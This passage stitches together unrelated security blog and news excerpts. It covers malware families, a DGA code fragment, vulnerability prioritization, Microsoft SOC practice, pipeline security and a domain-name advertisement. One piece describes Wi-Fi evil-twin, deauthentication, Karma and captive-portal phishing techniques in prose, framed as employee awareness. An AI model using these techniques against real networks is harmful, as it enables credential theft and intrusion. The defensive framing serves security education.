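    state = "{}-{}".format(seed, day).encode()
    for i in range(count):
        state = hashlib.md5(state + bytes([i])).digest()
        name = "".join(chr(ord("a") + b % 26) for b in state[:12])
        domains.append(name + ".com")
    return domains
```

Defenders who reverse-engineer the seed can pre-register or sinkhole the upcoming day's domains, which is exactly how many DGA botnets have been disrupted.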
Icloader is a generic malware that largely behaves like adware. The samples are packed and have evasive checks to hinder the analysis and conceal the real activities. This family can inject code in the address space of other processes and upload files to a remote server.
Bublik is a downloader that targets Windows hosts. Although it's primarily used as malware to distribute various banking trojans, it's also capable of extracting and exfiltrating sensitive information from the host.
Razy is oftentimes a generic detection name for a Windows trojan. These trojans collect sensitive information from the infected host, then format, encrypt, and send the data to a C2 server. In this case, some of the samples in certain identified clusters can be attributed to Cerber, although the detection name remains the same.
Vobfus is a worm that copies itself to external drives and attempts to gain automatic code execution via autorun.inf files. It also modifies the registry so that it will launch when the system is booted. Once installed, it attempts to download follow-on malware from its command and control (C2) servers.
Indicators of Compromise
Screenshots of Detection: AMP
Apple must be doing something right as the cost of Apple ID data on the Dark Web has dropped, even as the value of Fortnite, Facebook, Netflix and Uber accounts has increased.
Apple is losing value
Last year, I reported that online scammers were spending up to $15 per account on Apple ID information, making Apple customers “the most appealing targets” for scammers.
The latest edition of Top10VPN’s Dark Web Market Price Index claims scammers are only willing to spend up to $11 for this information today and are targeting arguably less well-secured services instead.
'Drupalgeddon' could be coming to websites running popular content management system, security specialists warn
MongoDB database instance was left unsecured and accessible online without so much as a password to protect it
Welcome to this week's Cyber Security Week in Review, where Cisco Talos runs down all of the news we think you need to know in the security world. For more news delivered to your inbox every week, sign up for our Threat Source newsletter here.
Top headlines this week
- U.S. officials charged a former member of the Air Force with defecting in order to help an Iranian cyber espionage unit. The Department of Justice says the woman collected information on former colleagues, and the Iranian hackers then attempted to target those individuals and install spyware on their computers.
- The U.S. Department of Justice is dismantling two task forces aimed at protecting American elections. The groups were originally created after the 2016 presidential election to prevent foreign interference, but after the 2018 midterms, the Trump administration shrank them significantly.
- Facebook and the U.S. government are closing in on a settlement over several privacy violations. Sources familiar with the discussions say it will likely result in a multimillion-dollar fine, likely to be the largest the Federal Trade Commission has ever imposed on a technology company.
- There’s been a recent uptick in Brushaloader infections. While the malware has been around since mid-2018, this new variant is more difficult than ever to detect on infected machines. New features include the ability to evade detection in sandboxes and to avoid anti-virus protection.
- Google says it’s stepping up its banning of malicious apps. The company says it’s seen a 66 percent increase in the number of apps it has banned from the Google Play store over the past year. Google says it scans more than 50 billion apps a day on users’ phones for malicious activity.
- A new campaign using the Separ malware is attempting to steal login credentials at large businesses. The malware uses short scripts and legitimate executable files to avoid detection.
- A new ATM malware called "WinPot" turns the machines into "slot machines." This allows hackers to essentially gamify ATM hacking, randomizing how much money the machine dispenses.
The rest of the news
- The U.S. is reviving a secret program to carry out supply-chain attacks against Iran. The cyber attacks are targeted at the country’s missile program. Over the past two months, two of Iran’s efforts to launch satellites have failed within minutes, though it’s difficult to assign those failures to the U.S.
- Australia says a “sophisticated state actor” carried out a cyber attack on its parliament. The ruling Liberal-National coalition parties say their systems were compromised in the attack. Since then, the country says it’s put “a number of measures” in place to protect its election system.
- Cisco released security updates for 15 vulnerabilities. Two critical bugs could allow attackers to gain root access to a system, and a third opens the door for a malicious actor to bypass authentication altogether.
- Facebook keeps a list of users that it believes could be a threat to the company or its employees. The database is made up of users who have made threatening posts against the company in the past.
When it comes to vulnerabilities, there is a range of severity and exploitability, which often dictates how quickly a flaw is fixed upon discovery. Most companies prioritize high severity and critical vulnerabilities, but ignore lower severity vulnerabilities. The highest severity flaws are less complicated to attack, offer more opportunity for full application compromise, and are more likely to be remotely exploitable — overall they tend to open up a wider attack blast radius.
In the State of Software Security Volume 9, we analyzed flaw persistence based on where vulnerabilities fall on our five-point severity scale, and we found that organizations hit the three-quarters-closed mark about 57% sooner for high and very high severity vulnerabilities than for their less severe counterparts. In fact, our scan data indicates that low severity flaws were attended to at a significantly slower rate than the average speed of closure: it took organizations an average of 604 days to close three quarters of these weaknesses.
Here’s the catch: there could be a low severity vulnerability that is affecting your code and it could be used to exploit your application.
Is the Vulnerability in the Execution Path?
There’s another dimension that often isn’t taken into account when prioritizing fixes, and that’s whether the vulnerability is actually impacting the code. When it comes to open source risk, for example, we know that it is multi-faceted and complex. Simply having a library with vulnerabilities in it does not mean that your app is at risk – you have to first understand if a vulnerable method is being called. When leveraging an open source library, it’s very common for a developer to only use a small subset of that library for a very particular function or capability. This means that it’s highly likely your application never calls on a vulnerability in the library and, in essence, is not exploitable.
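The "is the vulnerable method actually called?" question can be approximated statically. The sketch below is a deliberately naive illustration, not how any commercial analyzer works (real software composition analysis builds a full call graph across the app and its dependencies): it parses application source with Python's `ast` module and checks whether any function from a hypothetical list of vulnerable method names is invoked directly.

```python
import ast

def called_names(source):
    """Collect the names of every function invoked anywhere in the source."""
    names = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            func = node.func
            if isinstance(func, ast.Name):        # e.g. parse(x)
                names.add(func.id)
            elif isinstance(func, ast.Attribute):  # e.g. lib.parse(x)
                names.add(func.attr)
    return names

def vulnerable_method_reachable(app_source, vulnerable_methods):
    # A library flaw only matters if the app actually invokes one of
    # the affected methods (directly, in this simplified sketch;
    # transitive calls through the library are not followed).
    return bool(called_names(app_source) & set(vulnerable_methods))
```

This is the core idea behind vulnerable-method analysis: the same library, with the same CVE, is prioritized very differently depending on whether the flawed entry point is ever reached.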
Rather than prioritizing fixing a high-severity vulnerability in a function that is not called by your application, it would be more advantageous to prioritize a medium-severity vulnerability that lies in the execution path and puts your customers at risk. When developers have this information, they are empowered to prioritize and immediately fix vulnerabilities that pose the highest likelihood of exploitation. Additionally, their remediation time is reduced by up to 90 percent. The time saved for your developers, and the decreased time the attack window is open, is crucial to protecting your data.
That being said, just because a vulnerability isn’t in the execution path doesn’t necessarily mean your application isn’t exploitable – it may simply mean we were unable to identify an execution path for the vulnerability. It’s still important to fix all of the vulnerabilities in your application, especially the high and very high ones. Vulnerable method information allows your team to know, out of all of the vulnerabilities detected, which ones have the highest likelihood of exploit.
How Veracode’s Software Composition Analysis Can Help
With many tools out there, developers receive an extremely large list of vulnerabilities for all open source libraries packaged in an application, and they have to make a judgment call on what to fix first – and how much is worth fixing before pushing to production. Download the Addressing Your Open Source Risk eBook to learn more about how Veracode’s combination of machine learning and natural language processing can help you efficiently and effectively manage open source risk.
As the use of this technology grows so does the risk that attackers may hijack it
The post ML-era in cybersecurity: A step toward a safer world or the brink of chaos? appeared first on WeLiveSecurity
The size and sophistication of distributed denial-of-service (DDoS) attacks have risen at an ever-accelerating pace. As new 5G networks become operational, we expect the size of attacks to dwarf today's records. This is primarily due to the increase in IoT devices that 5G will introduce, with the number set to reach 4.1 billion globally by 2024. Each device is a perfect nest for botnets carrying malware, offering a new DDoS weapon for hackers to take advantage of.
Service providers will need to evolve rapidly with these growing threats and adopt intelligent automation to detect and mitigate security anomalies in a matter of seconds. Sophisticated DDoS threat intelligence, combined with real-time threat detection and automated signature extraction, will allow the marketplace to defend against even the most massive multi-vector DDoS attacks, no matter where they originate.
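The simplest building block underneath that kind of real-time detection is rate anomaly detection per source. The toy detector below is an illustrative assumption, not any vendor's algorithm: it keeps a sliding window of event timestamps per source and flags a source whose request rate exceeds a threshold within the window.

```python
from collections import deque

class RateAnomalyDetector:
    """Flag a source whose request rate in a sliding window exceeds a threshold."""

    def __init__(self, window_seconds=1.0, threshold=100):
        self.window = window_seconds
        self.threshold = threshold
        self.events = {}  # source -> deque of recent timestamps

    def observe(self, source, timestamp):
        q = self.events.setdefault(source, deque())
        q.append(timestamp)
        # Drop timestamps that have aged out of the window.
        while q and timestamp - q[0] > self.window:
            q.popleft()
        return len(q) > self.threshold  # True means anomalous
```

Production mitigation adds far more (multi-vector signatures, baselining, automated scrubbing), but the "detect in seconds" requirement starts with cheap streaming checks like this one.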
- Boundary/borderline cases, when decisions about which level is appropriate are arbitrary but the implications can be significant;
- Dynamics - something classified as medium right now may turn into a high or a low at some future point, perhaps when a certain event occurs;
- Context e.g. determining the sensitivity of information for deliberate internal distribution is not the same as for unauthorized access, especially external leakage and legal discovery (think: internal email);
- Dependencies and linkages e.g. an individual data point has more value as part of a time sequence or data set ...
- ... and aggregation e.g. a structured and systematic compilation of public information aggregated from various sources can be sensitive;
- Differing perspectives, biases and prejudices, plus limited knowledge, misunderstandings, plain mistakes and secret agendas of those who classify stuff, almost inevitably bringing an element of subjectivity to the process despite the appearance of objectivity;
- And the implicit "We've classified it and [maybe] done something about securing it ... so we're done here. Next!" attitude, which is dismissive.
- Sensitivity, confidentiality or privacy expectations;
- Source e.g. was it generated internally, found on the web, or supplied by a third party?;
- Trustworthiness, credibility and authenticity - could it have been faked?;
- Accuracy and precision, which matter for some applications, quite a lot really;
- Criticality for the business, safety, stakeholders, the world ...;
- Timeliness or freshness, age and history, hinting at the information lifecycle;
- Extent of distribution, whether known and authorized or not;
- Utility and value to various parties - not just the current or authorized possessors;
- Probability and impact of various incidents i.e. the information risks;
GandCrab has infected a slew of companies by targeting their MSPs. Third-party vendor hacks, where hackers attack a company by compromising one of its business associates, have been a problem for a while. Now, the hackers behind GandCrab ransomware have gotten into the act, exploiting a year-old SQL injection vulnerability in a common remote IT… Read More
The post GandCrab Ransomware Exploiting an Old Vulnerability to Infect New Victims appeared first on .
Your Wi-Fi routers and access points all have strong WPA2 passwords, unique SSIDs, the latest firmware updates, and even MAC address filtering. Good job, networking and cybersecurity teams! However, is your network truly protected? TL;DR: NO!
In this post, I’ll cover the most common social engineering Wi-Fi association techniques that target your employees and other network users. Some of them are very easy to launch, and if your users aren’t aware of and know how to avoid them, it’s only a matter of time until your network is breached.
Attackers only need a Unix computer (which can be as inexpensive and low-powered as a $30 Raspberry Pi), a Wi-Fi adapter with monitor mode enabled, and a 3G modem for remote control. They can also buy ready-made stations with all of the necessary tools and user interface, but where’s the fun in that?
Figure 1: Wi-Fi hacking tools
1. Evil Twin AP
An effortless technique: all attackers need to do is set up an open AP (access point) with the same or a similar SSID (name) as the target and wait for someone to connect. Placed where the target AP's signal is weak, it's only a matter of time until an employee connects, especially in big organizations. Impatient attackers may instead turn to the next technique.
Figure 2: Evil Twin Demonstration
2. Deauthentication / Disassociation Attack
In the current IEEE 802.11 (Wi-Fi protocol) standards, whenever a wireless station wants to leave the network, it sends a deauthentication or disassociation frame to the AP. These two frames are sent unencrypted and are not authenticated by the AP, which means anyone can spoof those packets.
This technique makes it very easy to sniff the WPA 4-way handshake needed for a Brute Force attack, since a single deauthentication packet is enough to force a client to reconnect.
Even more importantly, attackers can spoof these messages repeatedly and thus disable the communication between Wi-Fi clients and the target AP, which increases the chance your users will connect to the attacker's twin AP. Combining these two techniques works very well, but still depends on the user connecting to the fake AP. The following technique does not, however.
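Because deauthentication frames are unencrypted and unauthenticated, a flood of them is itself a detectable signal. The sketch below is a minimal, illustrative detector, assuming you already have frame timestamps and subtype labels from a monitor-mode capture parsed elsewhere (the tuple format here is an assumption for the example): it flags moments when an implausible number of deauthentication frames land inside a short window.

```python
def detect_deauth_flood(frames, window=1.0, threshold=5):
    """frames: iterable of (timestamp, subtype) tuples from a capture.

    Returns the timestamps at which more than `threshold` deauth
    frames were seen within the preceding `window` seconds.
    """
    deauths = sorted(t for t, subtype in frames if subtype == "deauth")
    alerts = []
    start = 0
    for i, t in enumerate(deauths):
        # Slide the window start forward past aged-out frames.
        while t - deauths[start] > window:
            start += 1
        if i - start + 1 > threshold:
            alerts.append(t)
    return alerts
```

A handful of deauths per hour is normal roaming behavior; dozens per second aimed at one AP almost never is, which is why wireless intrusion detection systems alert on exactly this pattern.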
3. Karma Attack
Whenever a user device’s Wi-Fi is turned on but not connected to a network, it openly broadcasts the SSIDs of previously-associated networks in an attempt to connect to one of them. These small packets, called probe requests, are publicly viewable by anyone in the area.
The information gathered from probe requests can be combined with geo-tagged wireless network databases such as Wigle.net to map the physical location of these networks.
If one of the probe requests contains an open Wi-Fi network SSID, then generating the same AP for which the user device is sending probes will cause the user’s laptop, phone or other device to connect to an attacker’s fake AP automatically.
Forcing any connected device to send probe requests is very easy, thanks to the previous technique.
Figure 3: Sniffing Probe Requests
4. Known Beacons
The final attack I’ll discuss that can lead your users to connect to an attacker’s fake AP is “Known Beacons.” This is a scattershot technique in which attackers broadcast dozens of beacon frames for common SSIDs that nearby wireless users have likely connected to in the past (like AndroidAP, Linksys, iPhone, etc.). Again, your users’ devices will automatically authenticate and connect due to the “Auto-Connect” feature.
An attacker has connected with your user, now what?
Once attackers have access to your user, there’s a variety of things they can do: sniff the victim’s traffic, steal login credentials, inject packets, scan ports, exploit the user’s device, and more. Most importantly, the attacker can also obtain the target AP’s password through a victim-customized web phishing attack.
Since the victim is using the attacker’s machine as a router, there are many ways to make the phishing page look convincing. One of them is a captive portal: by hijacking DNS, the attacker can forward all web requests to a local web server, so that the phishing page appears no matter what address the victim tries to reach. Even worse, most operating systems will identify the page as a legitimate captive portal and open it automatically!
Figure 4: Captive Portal Attack
5. Bypassing MAC Address Filtering
As mentioned, your networks may use MAC Filtering, which means only predefined devices can connect to your network and having the password is not enough. How much does that help?
MAC addresses are hard-coded into the network card, but attackers can override the address their operating system reports and pretend to be one of the allowed devices.
Attackers can easily get the MAC address of one of your network’s allowed devices, since every packet sent to and from your employee’s device includes its MAC address unencrypted. Of course, attackers have to force your employee’s device to disconnect (using deauthentication packets) before connecting to your network with the spoofed MAC address.
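One small heuristic for spotting software-assigned addresses: the IEEE 802 "locally administered" bit (the second-least-significant bit of the first octet) is set on MACs assigned in software and clear on most burned-in, vendor-assigned ones. It is only a hint, not proof of spoofing, since modern phones randomize their MACs legitimately, but it is trivial to check:

```python
def is_locally_administered(mac):
    # Bit 0x02 of the first octet distinguishes locally administered
    # (software-assigned) addresses from universally administered
    # (vendor burned-in) ones.
    first_octet = int(mac.split(":")[0], 16)
    return bool(first_octet & 0x02)
```

Flagging locally administered MACs on a network that whitelists specific hardware can surface both spoofing attempts and devices whose privacy randomization is fighting your filtering policy.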
How Can You Mitigate?
Detecting an Evil AP in your area can be done easily by scanning and comparing configurations of nearby access points. However, as with any social engineering attack, the best way to mitigate is by training your users, which is a critical element of security.
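That comparison can be as simple as checking every observed SSID/BSSID pair against an inventory of your legitimate access points. The sketch below assumes you already have scan results from whatever wireless survey tool you use (the data shapes are assumptions for the example): any of your SSIDs advertised from an unknown BSSID is worth investigating as a possible evil twin.

```python
def find_rogue_aps(observed, authorized):
    """observed: iterable of (ssid, bssid) pairs from a scan.
    authorized: dict mapping each of your SSIDs to the set of
    BSSIDs your real access points use.

    Returns APs advertising one of your SSIDs from an unknown BSSID.
    """
    return [(ssid, bssid) for ssid, bssid in observed
            if ssid in authorized and bssid not in authorized[ssid]]
```

Run periodically from a few vantage points in the building, a check like this catches the Evil Twin setups described above, though attackers can also clone BSSIDs, so treat it as one signal among several.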
Make sure your network users understand the risk of connecting to open access points and are well aware of the techniques mentioned. Running simulations of the above attacks is also recommended.
Finally, while specific techniques will come and go, social engineering will always remain a popular strategy for attackers. So make sure you and your users remain aware!
The post No One is Safe: the Five Most Popular Social Engineering Attacks Against Your Company’s Wi-Fi Network appeared first on Blog.
Cisco this week identified two “High” security vulnerabilities in its HyperFlex data-center package that could let attackers gain control of the system.
HyperFlex is Cisco’s hyperconverged infrastructure that offers computing, networking and storage resources in a single system.
The more critical of the two warnings – an 8.8 on Cisco’s severity scale of 1-10 – is a command-injection vulnerability in the cluster service manager of Cisco HyperFlex Software that could let an unauthenticated attacker execute commands as the root user.
The most effective phishing and malware campaigns usually employ one of the following two age-old social engineering techniques:
These online phishing campaigns impersonate a popular brand or product through specially crafted emails, SMS, or social media networks. These campaigns employ various methods including email spoofing, fake or real employee names, and recognized branding to trick users into believing they are from a legitimate source. Impersonation phishing campaigns may also contain a victim’s name, email address, account number, or some other personal detail.
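One common, easily automated impersonation signal is a sender domain that sits a character or two away from a trusted brand's domain. The sketch below is an illustrative heuristic, not a complete phishing filter, and the domains in the test are made-up examples; it flags near-miss domains using plain Levenshtein edit distance.

```python
def edit_distance(a, b):
    # Classic Levenshtein distance via dynamic programming.
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,          # deletion
                           cur[j - 1] + 1,       # insertion
                           prev[j - 1] + (ca != cb)))  # substitution
        prev = cur
    return prev[-1]

def looks_like_impersonation(sender_domain, trusted_domains, max_distance=2):
    # A domain one or two edits from a trusted brand, but not an exact
    # match, is a common typosquatting/impersonation signal.
    return any(0 < edit_distance(sender_domain, d) <= max_distance
               for d in trusted_domains)
```

Real mail filters combine this with authentication checks (SPF, DKIM, DMARC) and display-name analysis, but the lookalike-domain check alone stops a surprising share of brand-impersonation campaigns.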
We're frequently asked how we operate our Security Operations Center (SOC) at Microsoft (particularly as organizations are integrating cloud into their enterprise estate). This is the first in a three-part blog series designed to share our approach and experience, so you can use what we learned to improve your SOC.
In Part 1: Organization, we start with the critical organizational aspects (organizational purpose, culture, and metrics). In Part 2: People, we cover how we manage our most valuable resource: human talent. And finally, Part 3: Technology covers the technology that enables these people to accomplish their mission.
Overall SOC model
Microsoft has multiple security operations teams that each have specialized knowledge to protect the different technical environments at Microsoft. We use a “fusion center” model with a shared operating floor, which we call our Cyber Defense Operations Center (CDOC), to increase collaboration and facilitate rapid communication among these teams. Each team manages to the specific needs of their environment.
In this three-part series, we focus on the operation of our corporate IT SOC team, as they most closely reflect the challenges and approaches of our customers: having many users and endpoints, email attack vectors, and a hybrid of on-premises and cloud assets. In addition, we include a few lessons learned from the other SOCs and our Detection and Response Team (DART) that helps our customers respond to major incidents.
This SOC operates with three tiers of analysts plus automation, as seen in Figure 1 below. (We'll provide more details in Part 2: People.)
Figure 1. SOC analyst tiers plus automation.
The tooling in the SOC (Figure 2) is a mixture of centralized breadth capabilities and specialized tools to enable high quality alerts and an end-to-end investigation and remediation experience. (Part 3: Technology will provide more details.)
Figure 2. SOC tooling.
Like all things in security, our SOC has evolved considerably over the years to its current state and will continue to evolve. We recently noticed that our SOC had sustained 100+ percent growth in incidents handled over the past three years with a nearly flat staffing level. While we don't know if we can expect this astounding trend to continue in the future, it validates that we are on the right track and should share our learnings.
SOC organizational purpose
The first element we cover is the value of the SOC in the context of the overall mission and risk of the organization. As with the traditional incarnations of crime and espionage, we don't expect there will be a straightforward solution to cyberattacks. A SOC is often a crucial risk mitigation investment for an enterprise, as it is core to limiting how much time and access attackers have in the organization. This ultimately increases the attackers' cost and decreases the benefit, which damages their return on investment (ROI) and motivation for attacking your organization. Everything in the SOC should be oriented toward limiting the time and access attackers can gain to the organization's assets in an attack to mitigate business risk.
At Microsoft, our SOCs bear not just the responsibility of reducing risk to our employees and investors, but also the weight of the trust that millions of customers accessing our cloud services and products put in us.
We've learned that the SOC has four primary functional integration points with the business:
- Business context (to the SOC): The SOC needs to understand what is most important to the organization so the team can apply that context to fluid real-time security situations. What would have the most negative impact on the business? Downtime of critical systems? A loss of reputation and customer trust? Disclosure of sensitive data? Tampering with critical data or systems? We've learned it's critical that key leaders and staff in the SOC understand this context as they wade through the continuous flood of information and triage incidents and prioritize their time, attention, and effort.
- Joint practice exercises (with the SOC): Business leaders should regularly join the SOC in practicing response to major incidents. This builds the muscle memory and relationships that are critical to fast and effective decision making in the high pressure of real incidents, reducing organizational risk. This practice also reduces risk by exposing gaps and assumptions in the process that can be fixed prior to a real incident.
- Major incident updates (from the SOC): The SOC should provide updates to business stakeholders for major incidents as they happen. This allows business leaders to understand their risk and take both proactive and reactive steps to manage that risk. For more learnings on major incidents from our DART team, see the incident response reference guide.
- Business intelligence (from the SOC): Sometimes the SOC finds that adversaries are targeting a system or data set that isn't expected. As the SOC discovers the targets of attacks, it should share these with business leaders, as these signals may trigger insight for them (outside awareness of a secret business initiative, relative value of an overlooked data set, etc.).
If you take one thing away from this post, it's that the SOC culture is just as important as the individuals you hire and the tools you use. Culture guides countless decisions each day by establishing what the right answer looks and feels like in ambiguous situations, which are plentiful in a SOC.
Our cultural elements are very much focused on people, teamwork, and continuous learning and include these learnings:
- Use your human talent wisely: Our people are the most valuable asset we have in the SOC, and we can't afford to waste their time on repetitive, thoughtless tasks that can be automated. To combat the human threats we face, we need knowledgeable and well-equipped humans who can apply expertise, judgment, and creative thinking. This human factor affects almost every aspect of SOC operations, including the role of tools and automation in empowering humans to do more (versus replacing them) and in reducing toil on our analysts. (More on this topic in Part 2: People.)
- Teamwork: We've learned that we can't tolerate the lone-hero mindset in the SOC; nobody is as smart as all of us together. Teamwork makes a high-pressure working environment like the SOC much more fun, enjoyable, and productive when everyone knows they're on the same team and everyone has each other's back. We design our processes and tools to divide tasks into specialties and to encourage people to share insights, coordinate and check each other's work, and constantly learn from each other.
- Shift-left mindset: To get and stay ahead of cybercriminals and hackers who constantly evolve their techniques, we must continuously improve and shift our activities left in the attack timeline. We focus on speed and efficiency to try to get faster than the speed of attack by looking at ways we could have detected attacks earlier and responded more quickly. This principle is effectively an application of a continuous-learning growth mindset that keeps the team laser-focused on reducing risk for our organization and our customers.
The final organizational element is how we measure success, a critical element to get right. Metrics translate culture into clear, measurable objectives and have a powerful influence on shaping people's behavior. We've learned that it's critical to consider both what you measure and the way that you focus on and enforce those metrics. We measure several indicators of success in the SOC, but we always recognize that the SOC's job is to manage significant variables that are out of our direct control (attacks, attackers, etc.). We view deviations primarily as a learning opportunity for process or tool improvement rather than a failing on the part of the SOC to meet a goal.
These are the metrics we track, trend, and report on:
- Time to acknowledge (TTA): Responsiveness is one of the few elements the SOC has direct control over. We measure the time between an alert being raised (light starts to blink) and when an analyst acknowledges that alert and begins the investigation. Improving this responsiveness requires that analysts don't waste time investigating false positives while another true positive alert sits waiting. We achieve this with ruthless prioritization: any alert that requires an analyst response must have a track record of 90 percent true positives. We'll talk more about the technology we use in Part 3: Technology and will describe our use of cold path activities like proactive hunting to supplement the hot path of alerts in Part 2: People.
- Time to remediate (TTR): Much like many SOCs, we track the time to remediate an incident to ensure we're limiting the time attackers have access to our environment, which drives effectiveness and efficiencies in our SOC processes and tools.
- Incidents remediated (manually/with automation): We measure how many incidents are remediated manually and how many are resolved with automation. This ensures our staffing levels are appropriate and measures the effectiveness of our automation technology.
- Escalations between each tier: We track how many incidents are escalated between tiers to ensure we accurately capture the workload for each tier. For example, we need to ensure that Tier 1 work on an escalated incident isn't fully attributed to Tier 2.
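Computing metrics like these from incident records is straightforward. The sketch below is a generic illustration, not Microsoft's actual tooling; the field names and units (seconds since a common epoch) are assumptions made for the example:

```python
from statistics import mean

def soc_metrics(incidents):
    """incidents: list of dicts with 'raised', 'acknowledged', and
    'remediated' timestamps (seconds) plus an 'automated' flag."""
    return {
        # Mean time to acknowledge: alert raised -> analyst begins work.
        "mean_tta": mean(i["acknowledged"] - i["raised"] for i in incidents),
        # Mean time to remediate: alert raised -> incident closed out.
        "mean_ttr": mean(i["remediated"] - i["raised"] for i in incidents),
        # Share of incidents resolved by automation rather than by hand.
        "automated_ratio": sum(i["automated"] for i in incidents) / len(incidents),
    }
```

Trending these numbers over time, rather than judging any single incident, matches the "deviations are learning opportunities" stance described above.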
Our biggest recommendation for the SOC organization is to define the culture you want to inculcate. This will shape your team and attract the talent you want. In the coming weeks, we'll share our philosophy on managing people, career paths, skills, and readiness, and what tools we use to enable our people to accomplish their mission. In the meantime, head over to the CISO series to learn more.
The post Lessons learned from the Microsoft SOC—Part 1: Organization appeared first on Microsoft Secure.
Making a great first impression starts with your domain name
BackRub, Tokyo Tsushin Kogyo, DrivUrSelf, Research in Motion, Sound of Music.
Wonder if these big brands would have been as successful under their original names, had they not chosen to go by Google, Sony, Hertz Rent-A-Car, BlackBerry or Best Buy?
Unquestionably, the name of your company is the face of your brand. It’s the first thing your audience sees or hears about you, so choosing a business name that catches their attention and evokes credibility is paramount.
And in our competitive world today, your name online matters as much as it does offline. So it's critical to take the time and do your research before choosing your company's domain name. Consider the following five tips to help you find the winning one:
1. Pick your domain name BEFORE you register your business
Or do it as soon as possible. Whether you’re scribbling ideas on a napkin, in the early stages of development or a year away from launching a website, register your domain name and hold on to it until you’re ready.
2. Be open to all options
Be flexible because you may be surprised at what you’ll find! Evaluate options such as:
· localized (bestbakeryinlondon.com)
· keyword (consumersafeawards.com)
· phrase (keepdreamingup.net)
Just try it. You’ll probably be amazed at what you’ll come up with when your creative juices start flowing!
3. Assess your long-term goals
Avoid settling, or thinking "once we make it big, I'll get the domain name I really want." Take the time now to create a domain name that doesn't limit you and can scale as your business grows, especially if you're looking to branch out in the future.
For example, incorporating the state you do business in makes great sense if you want to stay localized, but will this work if you want to expand overseas? Should you promote the main product you’re selling now when you may have additional products or services in the future?
4. Choose your domain extension carefully
What's to the right of the dot IS as important as what's to the left. So be mindful of today's domain extension du jour. Hey, there's nothing wrong with wanting to be trendy, so why not focus that creativity on what's to the left of the dot? Then anchor it with a TLD that's tried, tested and trusted, such as a .com or a .net.
5. Use a domain name suggestion tool
To overcome a creative block, try a domain name suggestion service like NameStudio. Quick and easy to use, NameStudio helps you brainstorm with ease, providing unique and relevant domain name suggestions that help you stand out from the crowd and resonate with your target audience.
You can try NameStudio here.
Bottom line: You only have one shot to make a great first impression. And when you’re online, it starts with your domain name. So don’t treat it as an afterthought – spend the necessary time it takes to create a winning domain name that will help build your great brand.
Any company, product and service names and logos referenced herein are property of their respective owners and are for identification purposes only. Use of these names and logos does not imply endorsement.
The post 5 Tips to Choosing Your Winning Business Domain Name appeared first on Verisign Blog.
The First Step to Proactive Threat Defense.
ScoutThreat is a threat intelligence platform (TIP) focused on helping organizations disseminate intelligence by allowing threat modeling between atomic indicators and higher-level objects, assigning risk scores, and prioritizing threats as they pertain to your organization.
By linking atomic indicators such as IP addresses or hashes to higher-level objects such as a threat actor's motives or intent, a threat analyst builds the linkage that creates a knowledge base explaining why your organization is being targeted and provides the necessary intelligence when looking to prevent similar attacks in the future.
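That indicator-to-object linkage can be sketched with a tiny data model. The class and field names below are illustrative, not ScoutThreat's actual schema:

```python
from dataclasses import dataclass, field

# Hypothetical data model: atomic indicators (IPs, hashes) linked to a
# higher-level threat-actor object carrying motive and an analyst-assigned
# risk score. None of these names come from ScoutThreat itself.
@dataclass
class ThreatActor:
    name: str
    motive: str
    risk_score: int                 # e.g. 0-100, assigned by an analyst
    indicators: set = field(default_factory=set)

actor = ThreatActor(name="ExampleGroup", motive="financial", risk_score=80)
actor.indicators.add("198.51.100.7")                      # IP address
actor.indicators.add("44d88612fea8a8f36de82e1278abb02f")  # file hash

# Reverse index: seeing an indicator in logs recovers the actor context,
# i.e. the "why are we being targeted" knowledge described above.
by_indicator = {i: actor for i in actor.indicators}
print(by_indicator["198.51.100.7"].motive)
```

The reverse lookup is the payoff: an analyst who observes a bare IP can immediately pull up the motive, intent, and risk score attached to it.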
It's well known by now that pipeline attacks, and attacks on utilities of all kinds, have been an unfortunately well-trodden path for cyber-adversaries in numerous countries for a few years now. These types of attacks are not theoretical, and the damage done to date, as well as the potential damage, is significant.
With this backdrop, it was encouraging to see a few months ago that the U.S. Government was working in a coordinated fashion to push for better pipeline security. As part of the annual Cybersecurity Awareness Month each October, the U.S. Department of Energy (DOE) and Department of Homeland Security (DHS) met with the Oil and Natural Gas Subsector Coordinating Council (ONG SCC) to discuss ongoing threats having to do with pipeline security, resulting in the Pipeline Cybersecurity Initiative.
According to Hunton Andrews Kurth, the Pipeline Cybersecurity Initiative will harness DHS's cybersecurity resources, DOE's energy sector expertise, and the Transportation Security Administration's (TSA) assessment of pipeline security to provide intelligence to natural gas companies and support the ONG SCC's efforts.
And even though the Pipeline Cybersecurity Initiative is in its earliest stages, it's worth discussing the key items it relates to and how it might drive better cybersecurity hygiene going forward across the industry as a whole:
- Timing: The timing of this initiative is important. No longer can industry observers and experts claim that pipeline, energy, and utility security is not an issue. As indicated above, this is a genuine problem with real-world implications. Moreover, we know that this issue has occurred in a number of different countries.
- Industrial Internet of Things (IIoT): IIoT is a topic that continues to be raised in meetings with customers and partners around the world. Some of those customers are in financial services (think ATMs), others are in healthcare (think imaging machines), and yet others are, of course, in energy (think pipelines, pumping stations, etc.). My point is that across unrelated industries, this is a very real area that companies are increasingly taking seriously. Utility Dive summarizes this well: "With the prevalence of automation and digital sensors, pipelines moving a physical commodity, like oil or natural gas, are vulnerable to cyber-intrusions, just as a transmission line or power plant."
- Public-private partnership: The public-private nature of this partnership makes good sense and is great to see. For instance, it was important to see this mentioned so openly by the TSA in one of the accompanying statements; it is a clear indication that this is a complex issue that requires broader coordination and partnership. "The TSA is committed to the mission of securing the nation's natural gas and oil pipelines, and values longstanding relationships with pipeline operators across this great nation," said TSA Administrator David Pekoske. This also builds on the past few years of efforts in this realm in the U.S. specifically.
- An international issue: Beyond the U.S., other countries working on similar initiatives should be mentioned. While not a comprehensive list, it would be remiss not to mention other parts of the world that also either suffer from or worry about this issue, including the U.K., Denmark, and Australia.
To those of us in the cybersecurity world, energy security as it relates to cyberthreats has been a concern for a while. The known attacks have been disconcerting, and people beyond the energy industry have recognized this. Practitioners and defenders have been doing fabulous work, and the Pipeline Cybersecurity Initiative will help ensure that additional resources, information-sharing, and coordination mitigate further cyber-related risks against the U.S. energy industry in the coming years. For more information on infrastructure security, read "Defending critical infrastructure is imperative" and listen to the Cybersecurity Tech Accord web seminar, "Cyberattacks on infrastructure."
The post Why the Pipeline Cybersecurity Initiative is a critical step appeared first on Microsoft Secure.
